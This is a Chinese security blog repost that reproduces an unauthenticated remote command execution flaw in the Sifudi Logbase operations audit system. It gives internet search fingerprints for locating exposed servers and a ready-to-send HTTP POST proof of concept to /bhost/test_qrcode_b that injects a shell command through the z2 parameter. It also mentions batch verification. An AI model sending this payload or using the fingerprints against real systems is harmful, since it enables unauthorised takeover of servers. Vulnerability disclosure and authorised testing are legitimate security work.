【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】

admin 2023年12月15日08:38:08评论85 views字数 804阅读2分40秒阅读模式

声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

产品简介

为满足用户对加强内部运维安全审计日益迫切的需要,杭州思福迪信息技术有限公司依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化运维安全专用审计系统——Logbase运维安全管理系统。该系统支持对企业内部人员的维护行为进行全面的管理、审计,消除了传统审计系统中的盲点,使企业对运维人员的操作过程,能做到事前防范、事中控制、事后审计的能力,是企业IT内控最有效的运维管理平台。

漏洞简介

思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。

指纹识别

# fofa: product="思福迪-LOGBASE"# hunter: web.body="思福迪-LOGBASE"# zoomeye: app:"思福迪运维安全管理系统"

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】

漏洞验证

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】

poc:

POST /bhost/test_qrcode_b HTTP/1.1User-Agent: Go-http-client/1.1Accept-Encoding: gzip, deflate, brAccept: gzipConnection: closeReferer: Content-Type: application/x-www-form-urlencodedHost: Content-Length: 23

z1=1&z2="|id;"&z3=bhost

发送POC:

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】

批量验证:

批量验证:

【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】

原文始发于微信公众号(猫蛋儿安全):【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日08:38:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】https://cn-sec.com/archives/2301979.html

发表评论

匿名网友 填写信息